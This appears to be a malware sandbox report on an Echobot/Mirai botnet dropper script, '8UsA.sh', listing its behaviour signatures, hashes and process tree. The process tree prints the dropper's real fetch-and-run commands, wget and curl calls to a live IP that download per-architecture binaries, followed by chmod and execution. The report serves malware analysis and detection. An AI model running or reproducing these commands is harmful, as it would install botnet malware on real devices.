Overview

overview

10

Static

static

1

8UsA.sh

ubuntu-18.04-amd64

10

8UsA.sh

debian-9-armhf

10

8UsA.sh

debian-9-mips

10

8UsA.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    22-11-2024 18:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8UsA.sh

  • Size

    1KB

  • MD5

    513641f5f60d55559c2060489de6d605

  • SHA1

    c95feec2255732b60d434b0639b88a5cff205ea0

  • SHA256

    1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd

  • SHA512

    71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0

Score
10/10
echobotmiraibotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 1 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (166712) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 10 IoCs
  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/8UsA.sh
    /tmp/8UsA.sh
    1⤵
    • Writes file to tmp directory
    PID:1477
    • /usr/bin/wget
      wget http://89.22.230.162/bins/UnHAnaAW.x86
      2⤵
      • Writes file to tmp directory
      PID:1478
    • /usr/bin/curl
      curl -O http://89.22.230.162/bins/UnHAnaAW.x86
      2⤵
      • Writes file to tmp directory
      PID:1482
    • /bin/cat
      cat UnHAnaAW.x86
      2⤵
        PID:1483
      • /bin/chmod
        chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-9NorHk UnHAnaAW.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1484
      • /tmp/3AvA
        ./3AvA x86
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:1485
      • /usr/bin/wget
        wget http://89.22.230.162/bins/UnHAnaAW.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1489
      • /usr/bin/curl
        curl -O http://89.22.230.162/bins/UnHAnaAW.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1496
      • /bin/chmod
        chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-9NorHk UnHAnaAW.mips UnHAnaAW.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1498
      • /tmp/3AvA
        ./3AvA mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:1499
      • /usr/bin/wget
        wget http://89.22.230.162/bins/UnHAnaAW.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1511
      • /usr/bin/curl
        curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1518
      • /bin/chmod
        chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-9NorHk UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1520
      • /tmp/3AvA
        ./3AvA mpsl
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Changes its process name
        • Reads system network configuration
        • Reads runtime system information
        PID:1521
      • /usr/bin/wget
        wget http://89.22.230.162/bins/UnHAnaAW.arm4
        2⤵
          PID:1525
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
          2⤵
          • Writes file to tmp directory
          PID:1532
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-9NorHk UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1534
        • /tmp/3AvA
          ./3AvA arm4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1535
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.arm5
          2⤵
          • Writes file to tmp directory
          PID:1539
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
          2⤵
          • Writes file to tmp directory
          PID:1546
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-9NorHk UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1548
        • /tmp/3AvA
          ./3AvA arm5
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1549
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.arm6
          2⤵
          • Writes file to tmp directory
          PID:1555
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
          2⤵
          • Writes file to tmp directory
          PID:1562
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1564
        • /tmp/3AvA
          ./3AvA arm6
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1565
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.arm7
          2⤵
          • Writes file to tmp directory
          PID:1569
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
          2⤵
          • Writes file to tmp directory
          PID:1576
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1578
        • /tmp/3AvA
          ./3AvA arm7
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1579
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.ppc
          2⤵
          • Writes file to tmp directory
          PID:1583
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
          2⤵
          • Writes file to tmp directory
          PID:1590
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1592
        • /tmp/3AvA
          ./3AvA ppc
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1593
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.m68k
          2⤵
          • Writes file to tmp directory
          PID:1597
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
          2⤵
          • Writes file to tmp directory
          PID:1604
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1606
        • /tmp/3AvA
          ./3AvA m68k
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1607
        • /usr/bin/wget
          wget http://89.22.230.162/bins/UnHAnaAW.sh4
          2⤵
          • Writes file to tmp directory
          PID:1611
        • /usr/bin/curl
          curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
          2⤵
          • Writes file to tmp directory
          PID:1618
        • /bin/chmod
          chmod +x 3AvA 8UsA.sh config-err-wyp2Uv netplan_gsm552c4 snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.sh4 UnHAnaAW.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1620
        • /tmp/3AvA
          ./3AvA sh4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:1621

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/UnHAnaAW.x86
        Filesize

        69KB

        MD5

        4a5306ed50853b2ce31d13763bde2cd3

        SHA1

        12a84067a5b8ff314e005365faadd34d47ce0619

        SHA256

        81d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d

        SHA512

        b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081

        Download Submit